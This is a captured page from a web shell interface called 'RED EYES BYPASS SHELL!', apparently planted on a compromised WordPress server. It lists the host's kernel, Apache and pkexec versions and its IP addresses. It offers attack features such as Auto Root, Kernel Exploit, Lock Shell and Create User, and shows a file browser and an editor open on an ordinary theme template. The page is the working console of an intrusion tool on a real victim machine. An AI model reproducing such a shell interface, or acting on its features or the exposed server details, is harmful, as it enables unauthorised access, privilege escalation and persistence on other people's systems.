Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
entr /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
404.php
467
B
-rwxr-xr-x
archive.php
79
B
-rwxr-xr-x
comments.php
1.55
KB
-rwxr-xr-x
content-none.php
971
B
-rwxr-xr-x
content.php
449
B
-rwxr-xr-x
footer.php
193
B
-rwxr-xr-x
functions.php
12.96
KB
-rwxr-xr-x
header-builders.php
669
B
-rwxr-xr-x
header.php
792
B
-rwxr-xr-x
index.php
243
B
-rwxr-xr-x
readme.txt
3.3
KB
-rwxr-xr-x
rtl.css
31.65
KB
-rwxr-xr-x
screenshot.png
205.18
KB
-rwxr-xr-x
search.php
426
B
-rwxr-xr-x
sidebar.php
176
B
-rwxr-xr-x
single-elementor_library.php
373
B
-rwxr-xr-x
singular.php
167
B
-rwxr-xr-x
style.css
22.4
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-none.php
<div class="error-template text-center no-content"> <h1> <?php esc_html_e('Nothing Found', 'entr'); ?> </h1> <?php if (is_home() && current_user_can('publish_posts')) : ?> <p> <?php /* translators: %1$s: link to admin area */ printf(wp_kses(__('Ready to publish your first post? <a href="%1$s">Get started here</a>.', 'entr'), array('a' => array('href' => array()))), esc_url(admin_url('post-new.php'))); ?> </p> <?php elseif (is_search()) : ?> <p> <?php esc_html_e('Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'entr'); ?> </p> <?php get_search_form(); ?> <?php else : ?> <p> <?php esc_html_e('It seems we can’t find what you’re looking for. Perhaps searching can help.', 'entr'); ?> </p> <?php get_search_form(); ?> <?php endif; ?> </div>
Close